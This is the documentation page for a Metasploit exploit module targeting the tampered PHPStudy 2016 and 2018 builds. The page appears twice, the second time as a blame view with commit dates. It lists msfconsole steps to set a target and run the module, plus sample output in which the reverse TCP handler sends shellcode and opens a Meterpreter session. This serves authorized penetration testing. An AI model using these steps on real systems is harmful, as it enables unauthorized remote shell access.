documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md

## Description

PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.

## Vulnerable Application

The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018

## Verification Steps

1. Start msfconsole
2. Do:```use exploit/multi/http/phpstudy_backdoor_rce``` 
3. Do:```set rhosts <target>```
4. Do:```run```

If your target is vulnerable, you will get a shell. 
you should see an output similar to the following

```
msf exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104
rhosts => 192.168.56.104
msf exploit(multi/http/phpstudy_backdoor_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[+] Sending shellcode
[*] Sending stage (38288 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800

meterpreter > 
```
Add phpstudy backdoor exploit module 2020-02-23 10:23:32 +08:00			`## Description`

			`PHPStudy is free software, it is a one-click installation software, which includes PHP, MySQL, Apache and more. At some point in time, hackers were able to hack into phpStudy and tamper on 2016 and 2018 versions of the software to make it vulnerable to this specific exploit.`

			`## Vulnerable Application`

			`The vulnerability exists in php-5.4.45 and php-5.2.17 service versions in PHPStudy2016 and PHPStudy2018`

			`## Verification Steps`

			`1. Start msfconsole`
			2. Do:```use exploit/multi/http/phpstudy_backdoor_rce```
			3. Do:```set rhosts <target>```
			4. Do:```run```

			`If your target is vulnerable, you will get a shell.`
			`you should see an output similar to the following`

			```
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104`
Add phpstudy backdoor exploit module 2020-02-23 10:23:32 +08:00			`rhosts => 192.168.56.104`
Updates msf5 as well 2025-07-17 11:51:29 +01:00			`msf exploit(multi/http/phpstudy_backdoor_rce) > run`
Add phpstudy backdoor exploit module 2020-02-23 10:23:32 +08:00
			`[*] Started reverse TCP handler on 192.168.56.1:4444`
			`[+] Sending shellcode`
			`[*] Sending stage (38288 bytes) to 192.168.56.104`
			`[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.104:49169) at 2020-02-23 10:11:40 +0800`

			`meterpreter >`
			```